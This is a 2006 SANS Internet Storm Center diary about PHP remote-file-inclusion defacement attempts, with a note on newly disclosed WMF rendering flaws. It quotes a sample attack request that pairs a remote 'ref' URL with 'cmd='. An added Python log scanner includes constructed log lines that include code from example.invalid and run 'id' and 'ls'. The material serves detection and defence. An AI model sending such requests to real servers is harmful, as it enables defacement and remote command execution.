
SANS ISC: InfoSec Handlers Diary Blog - Internet Storm Center Diary 2006-01-09



Probable php shell/web defacement tool usage on the rise

Published: 2006-01-09
Last Updated: 2006-01-09 23:00:39 UTC
by William Salusky (Version: 2)
The ISC handler mailbox has received multiple reports of web site defacement attempts apparently using the "Defacing Tool 2.0 by r3v3ng4ns" suite of PHP-based scripts, which deface websites by leveraging PHP remote file inclusion.  Multiple reports in a short period of time seem to indicate aggressive scanning activity leveraging this tool suite.  This particular attacker/tool combination has search engine hits going back to early December 2005, so the tool has been around for at the very least a short period of time.  The initially reported site hosting the PHP scripts has already removed the offending tools, but script hosting will always remain a moving target.

If you are running PHP-enabled web servers, take a peek at your recent HTTP logs for any hits similar to the following.  The common thread is 'ref=' and 'cmd=' appearing in the same HTTP log entry.  It looks fairly trivial to create a snort signature to identify this scanning/abuse, considering that this is an edge case the bleedingsnort rules do not yet alert on.  We'll probably post a usable snort signature later today.

GET /?ref=http://www.[removed]/[MultipleTargetFiles].dot?&cmd=
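As an added example (not part of the original diary), the following Python script checks access-log lines for the pattern described above: a request whose query string carries both a 'ref' and a 'cmd' parameter, with a 'ref' value pointing at an external URL being the remote-include tell. The log lines are constructed for illustration; the hostname example.invalid is a placeholder.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample access-log lines in Common Log Format (not real traffic).
SAMPLE_LOG = """\
192.0.2.10 - - [09/Jan/2006:14:02:11 +0000] "GET /?ref=http://example.invalid/tool.dot?&cmd=id HTTP/1.1" 200 512
192.0.2.11 - - [09/Jan/2006:14:02:12 +0000] "GET /index.php?ref=homepage HTTP/1.1" 200 4096
192.0.2.12 - - [09/Jan/2006:14:02:13 +0000] "GET /modules.php?name=News&ref=http://example.invalid/x.dot?&cmd=ls HTTP/1.0" 404 210
192.0.2.13 - - [09/Jan/2006:14:02:14 +0000] "POST /login.php HTTP/1.1" 302 0
"""

# Common Log Format: client, identd, user, [timestamp], "METHOD URI PROTO", status, size
CLF_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<uri>\S+) [^"]*" (?P<status>\d{3})'
)


def flag_line(line):
    """Return a finding dict when the request carries both 'ref' and 'cmd'
    query parameters (the diary's common thread), otherwise None."""
    m = CLF_RE.match(line)
    if not m:
        return None
    # Split on the first '?' so a second '?' inside the ref value stays in the query.
    query = urlsplit(m.group("uri")).query
    params = parse_qs(query, keep_blank_values=True)
    if "ref" not in params or "cmd" not in params:
        return None
    ref = params["ref"][0]
    return {
        "ip": m.group("ip"),
        "ts": m.group("ts"),
        "status": int(m.group("status")),
        "ref": ref,
        "cmd": params["cmd"][0],
        # A ref pointing at an external host is the remote file inclusion pattern.
        "remote_ref": ref.lower().startswith(("http://", "https://", "ftp://")),
    }


def scan_log(text):
    """Scan a block of log text and return all flagged findings in order."""
    return [f for f in (flag_line(l) for l in text.splitlines()) if f]


if __name__ == "__main__":
    for finding in scan_log(SAMPLE_LOG):
        print(finding)
```

A 200 status on a flagged line deserves a closer look than a 404, since it means the included URL was processed rather than rejected.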

If you find unique hits on this abuse, feel free to report them back to us and we will make notification to the script hosting provider.

If you manage a web host that you are certain does not require the use of remote includes, you can disable that functionality in your php.ini configuration file by modifying the following variable.

/etc/php.ini
allow_url_fopen = Off

We have received additional reports of attempted site defacement leveraging the same tool suite referenced above but targeting PHP-Nuke sites specifically.  As with any complex PHP application, keep them patched.

Another WMF attack vector?

Published: 2006-01-09
Last Updated: 2006-01-09 22:02:13 UTC
by William Salusky (Version: 2)
We had hoped the chapter on WMF exploits had finally been closed, pending the patching of countless millions of vulnerable workstations, of course.  However, today we were forwarded a Bugtraq disclosure of two additional functions vulnerable to memory corruption attacks within the Microsoft graphics rendering engine.  The flaw reportedly affects the 'ExtCreateRegion' and 'ExtEscape' functions, and while no proof of concept exploit/DoS code has been publicly released so far, we will be watching this issue closely.

reference: http://www.securityfocus.com/bid/16167  (Sorry, you have to cut/paste).

So, is there a new WMF remote code execution threat here?
Microsoft representative response:
"The short answer is no. These are not exploitable bugs (DoS only)"

The SANS handlers have been notified that a Microsoft official response to today's Bugtraq disclosure will be posted shortly at:
http://blogs.technet.com/msrc/

<resume handler musings> However, infosec history teaches us that where there is a DoS proof of concept, there very likely is remote code execution.  I myself will wait for smarter folks than myself to prove the statement.